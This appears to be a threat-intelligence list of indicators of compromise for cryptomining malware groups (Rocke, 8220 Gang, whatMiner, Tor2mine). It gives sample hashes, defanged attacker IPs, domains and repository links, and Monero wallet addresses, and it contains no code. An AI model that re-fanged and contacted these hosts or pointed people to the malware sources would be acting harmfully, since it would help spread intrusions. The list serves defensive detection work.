2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf
b1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh
7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin
904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg
f792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin
dcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin
3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh
a598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db
74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt

Samples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net:
17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0
4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86

Wallets
rocke@live.cn
44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W
44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3
45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV
88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqwGto

8220 Gang

45[.]32[.]39[.]40:8220
45[.]77[.]24[.]16
54[.]37[.]57[.]99:8220
67[.]21[.]81[.]179:8220
67[.]231[.]243[.]10:8220
98[.]142[.]140[.]13:8220
98[.]142[.]140[.]13:3333
98[.]142[.]140[.]13:8888
104[.]129[.]171[.]172:8220
104[.]225[.]147[.]196:8220
128[.]199[.]86[.]57:8220
142[.]4[.]124[.]50:8220
142[.]4[.]124[.]164:8220
158[.]69[.]133[.]17:8220
158[.]69[.]133[.]18:8220
158[.]69[.]133[.]20:3333
162[.]212[.]157[.]244:8220
165[.]227[.]215[.]212:8220
185[.]82[.]218[.]206:8220
192[.]99[.]142[.]226:8220
192[.]99[.]142[.]227
192[.]99[.]142[.]232:8220
192[.]99[.]142[.]235:8220
192[.]99[.]142[.]240:8220
192[.]99[.]142[.]248:8220
192[.]99[.]142[.]249:3333
192[.]99[.]142[.]251:80
192[.]99[.]56[.]117:8220
195[.]123[.]224[.]186:8220
198[.]181[.]41[.]97:8220
202[.]144[.]193[.]110:3333
hxxps://github[.]com/MRdoulestar/whatMiner

1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13
e2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e
31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1
cb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35
cfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e
efbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803
384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52

Samples associated with whatMiner:
f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c
1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7
3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04
241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f
3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04

Wallets
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S

Tor2mine

107[.]181[.]160[.]197
107[.]181[.]174[.]248
107[.]181[.]187[.]132
asq[.]r77vh0[.]pw
194[.]67[.]204[.]189
qm7gmtaagejolddt[.]onion[.]to
res1[.]myrms[.]pw
hxxps://gitlab[.]com/Shtrawban
rig[.]zxcvb[.]pw
back123[.]brasilia[.]me

91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe
44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe
3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe
c3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe
4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1
904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat
4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta
af780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta
cc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1
ee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta
a7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat
0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php
e0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat
b2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1
18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe
112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1
e1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta
61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1
f1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat
cce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe

Uncategorized groups

188[.]166[.]38[.]137
91[.]121[.]87[.]10
94[.]23[.]206[.]130

46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava
44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg